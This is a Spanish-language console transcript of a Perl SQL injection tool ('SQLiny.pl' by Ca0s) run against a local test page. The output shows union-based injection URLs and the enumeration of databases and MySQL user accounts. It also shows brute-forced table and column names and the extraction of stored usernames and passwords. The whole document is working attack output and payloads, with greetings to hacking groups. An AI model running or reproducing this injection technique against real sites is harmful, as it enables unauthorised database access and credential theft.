C:\Users\Javi\Desktop\Under\Scripts>SQLiny.pl http://127.0.0.1/test/SQLi/?id=1 -f [/\/\/] | Perl SQL Inyector v1.5 <----> By Ca0s {Alias sh0k!} | [\/\/\] ----------------------------------------------------------------------- Gr33tz: | #RemoteExecution | DiosDeLaRed | EvilZone | { st4ck-3rr0r.blogspot.com } [+] Objetivo: http://127.0.0.1/test/SQLi/?id=1 [+] Fuerza bruta activada... be patient my friend :-) [+] Numero de parametros: 3 [+] URL: -- http://127.0.0.1/test/SQLi/?id=1+AND+1=2+union+select+1,2,3 [+] Valores que imprimen: 1 2 [+] Base de datos actual: test [+] Bases de datos en el servidor: -- information_schema -- bot -- cdcol -- miweb -- mysql -- phpmyadmin -- test [+] Usuario actual: *@localhost [+] Probando load_file(): [-] load_file no disponible. [+] Probando mysql.user... [+] Mysql.Users disponible, extrayendo... -- Numero de usuarios: 2 ! -> Usuario encontrado: root : * ! -> Usuario encontrado: pma : * [+] Probando information_schema... Information_Schema no disponible, probando fuerza bruta... Atacando: http://127.0.0.1/test/SQLi/?id=1+AND+1=2+UNION+SELECT+0x636130735f7363616e6e65725f7461626c655f666f756e64,2,3 Probando 182 nombres de tablas... - Probados 0 / 182 - Probados 10 / 182 - Probados 20 / 182 - Probados 30 / 182 - Probados 40 / 182 - Probados 50 / 182 - Probados 60 / 182 - Probados 70 / 182 - Probados 80 / 182 - Probados 90 / 182 - Probados 100 / 182 - Probados 110 / 182 - Probados 120 / 182 - Probados 130 / 182 - Probados 140 / 182 - Probados 150 / 182 - Probados 160 / 182 - Probados 170 / 182 - Probados 180 / 182 [!] Tabla encontrada: "sqli" :-) [+] Tablas encontradas: 1 -- sqli [*] Selecciona una tabla para brutear columnas: (introduce numero) 1 [+] Tabla elegida: sqli. - Probados 0 / 102 [!] Columna encontrada: "nombre" [!] Columna encontrada: "pass" [!] Columna encontrada: "id" - Probados 10 / 102 - Probados 20 / 102 - Probados 30 / 102 - Probados 40 / 102 - Probados 50 / 102 - Probados 60 / 102 - Probados 70 / 102 - Probados 80 / 102 - Probados 90 / 102 - Probados 100 / 102 [+] Columnas encontradas en < sqli > : -- nombre -- pass -- id Extraer datos de la tabla (con las columnas encontradas) ? (S/N)s -- Rows: 2 [nombre](0) -> ca0s [pass](0) -> test [id](0) -> 1 ------------------------------- [nombre](1) -> test [pass](1) -> asd [id](1) -> 2 ------------------------------- [/] Guardar tabla en archivo de texto? (S/N) n [/]Brutear otra tabla? (S/N) n [+] Finalizado <|>->->->->->->->Ca0s {st4ck-3rr0r.blogspot.com}// c40s[at]hotmail[dot]es <-|> C:\Users\Javi\Desktop\Under\Scripts>